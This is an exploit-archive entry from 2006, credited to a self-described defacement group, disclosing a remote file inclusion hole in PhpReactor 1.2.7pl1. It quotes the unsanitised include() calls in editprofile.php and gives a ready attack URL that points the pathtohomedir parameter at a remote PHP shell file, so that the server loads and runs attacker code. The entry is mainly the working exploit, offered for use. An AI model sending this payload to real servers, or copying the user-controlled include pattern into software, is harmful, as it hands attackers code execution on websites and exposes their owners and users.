[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability
# Published : 2006-07-31
# Author : CeNGiZ-HaN
# Previous Title : XMB <= 1.9.6 (u2uid) Remote SQL Injection Exploit (mq=off)
# Next Title : PgMarket <= 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerability
########################### www.system-defacers.org ###############
# Found By CeNGiZ-HaN cengiz-han@system-defacers.org
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
############################################################################
# Vulnerable Code in editprofile.php
# //INCLUDE DB FUNCTIONS
# if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
# //INCLUDE LANGUAGE FUNCTIONS
# if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
# //INCLUDE USERS FUNCTIONS
# if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
# //INCLUDE BBS FUNCTIONS
# if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
#
#
# http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
#
##############################################################################
#
# W W W . S Y S T E M - D E F A C E R S . O R G
#
##############################################################################
# www.Syue.com [2006-07-31]